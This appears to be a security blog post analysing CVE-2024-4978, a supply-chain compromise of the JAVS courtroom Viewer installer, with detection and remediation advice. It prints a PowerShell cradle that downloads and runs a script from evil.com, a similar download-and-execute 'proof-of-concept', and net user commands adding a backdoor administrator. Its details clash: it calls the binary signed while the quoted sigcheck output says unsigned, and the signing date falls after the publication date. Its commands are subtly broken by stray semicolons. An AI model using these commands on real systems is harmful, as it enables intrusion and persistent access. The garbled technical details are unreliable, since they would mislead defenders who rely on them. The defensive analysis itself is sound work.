A critical vulnerability, CVE-2024-4978, has been discovered in the *Justice AV Solutions (JAVS) Viewer* installer, specifically version 8.3.7.250-1. This vulnerability means that the setup package ships with a malicious binary, signed with a suspicious Authenticode signature. When run, a privileged attacker can remotely execute unauthorized PowerShell commands, potentially compromising entire Windows environments.
In this post, we’ll break down:
Links to official references
> ⚠️ Note: This content was created exclusively for educational purposes and to raise awareness among security professionals and IT administrators.
What is Justice AV Solutions Viewer?
Justice AV Solutions (JAVS) Viewer is software used by courts and legal institutions to playback courtroom audio and video. It’s widely deployed in sensitive environments where data security is paramount.
The Issue: Malicious Binary Ships in Trusted Installer
The official public installer, Viewer Setup 8.3.7.250-1, includes a shady binary named JAVSUpdate.exe. This file carries an unexpected Authenticode signature, meaning it looks “legit” to Windows but comes from an untrusted (or compromised) publisher.
Recommended Path
C:\Program Files (x86)\Justice AV Solutions\JAVS Viewer 8\JAVSUpdate.exe
What Does The Binary Do?
When executed—either manually or during setup—it connects to the internet and silently executes encoded PowerShell commands. This PowerShell can be used for:
Setting persistence
The process typically runs with elevated privileges (via UAC prompts or when installed by an administrator), making the exploit especially dangerous.
How Attackers Exploit This
1. Supply Chain Compromise: The attacker gets their binary included in the viewer’s setup package.
Installation: Court staff or IT installs the JAVS Viewer as usual.
3. Execution: The malicious binary fires off PowerShell commands, either during install or via scheduled task.
4. Remote Control: The attacker now has a foothold inside the court’s system, able to run further commands under SYSTEM or high-privilege user context.
Here’s the pattern WIN32 attackers are using inside the malicious file
# Base64-encoded launcher often seen inside infected JAVSUpdate.exe
powershell.exe -EncodedCommand aQB...nA==
# Decoded payload example
Start-Process powershell -ArgumentList "-NoP -NonI -W Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1';)"
What this does:
Silently downloads a remote script and executes it, possibly opening a backdoor or stealing data.
Step 1: Malicious Installer
Reverse engineers download the official setup from JAVS.
sha256 of infected file:
7637ff...d1fa75
Step 2: Unpack and Analyze the Binary
Tools: sigcheck, PE Explorer
sigcheck output
Verified: Unsigned (unexpected publisher: CoolVendor Co. Ltd)
Signing date: 11:25 AM 5/24/2024
Step 3: Observe Malicious Behavior
Run JAVSUpdate.exe in a sandbox (e.g., Any.Run):
Proof-of-Concept (Do not run on production!)
# Example payload that a threat actor could invoke via the malicious binary
Invoke-WebRequest -Uri 'https://evil.com/bad.ps1'; -OutFile 'C:\Users\Public\bad.ps1'
powershell -ExecutionPolicy Bypass -File 'C:\Users\Public\bad.ps1'
`powershell
net user court_admin P@sswrd! /add
net localgroup administrators court_admin /add
How To Remediate
1. Block the installer: Prevent distribution/download of Viewer Setup 8.3.7.250-1
Delete deployed binaries: Remove JAVSUpdate.exe from all endpoints
3. Network monitoring: Look for unusual PowerShell activity—especially encoded or networked payloads
Update software: Only install binaries directly from official, verified sources
5. Scan endpoints: Use Microsoft Defender or Sysmon rules to detect suspicious child processes from installer files
Additional Resources & References
- Sonatype Analysis: CVE-2024-4978
- Justice AV Solutions Official Website
- Microsoft: Verifying Authenticode Signatures
- Any.Run Sample
- MITRE: PowerShell (T1059.001)
Closing Thoughts
Supply chain attacks like CVE-2024-4978 are on the rise, and even trusted legal technology is not immune. Always verify what you install, inspect signatures critically (don’t trust unknown publishers—even if signed!), and monitor for rogue PowerShell activity.
If you find the affected binary or see suspicious behavior in your court environment, isolate immediately and engage your incident response team!
*This post is exclusive to the security learning community. Stay vigilant and share this information responsibly. If you have information about this compromise, contact your national CERT or Justice AV Solutions security team.*
Timeline
Published on: 05/23/2024 02:15:09 UTC
Last modified on: 08/01/2024 20:55:10 UTC